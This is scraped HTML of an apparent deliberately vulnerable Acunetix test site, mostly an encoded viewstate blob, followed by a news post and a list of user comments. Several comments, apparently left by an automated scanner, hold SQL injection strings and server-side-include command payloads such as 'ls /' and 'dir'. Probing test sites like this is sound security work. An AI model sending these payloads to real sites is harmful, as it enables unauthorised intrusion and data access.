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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLp86GkDQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBFb15s1JCeRIciuExDtbdPtd1ITa" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:52 AM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:28 AM</DIV><DIV class="CommentText">hvEYyWNN UNION ALL select NULL -- </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:42:51 AM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:30 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:27 AM</DIV><DIV class="CommentText">hvEYyWNN" AND "1"="1" -- </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:28 AM</DIV><DIV class="CommentText">hvEYyWNN AND 1=1</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:01 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:43:21 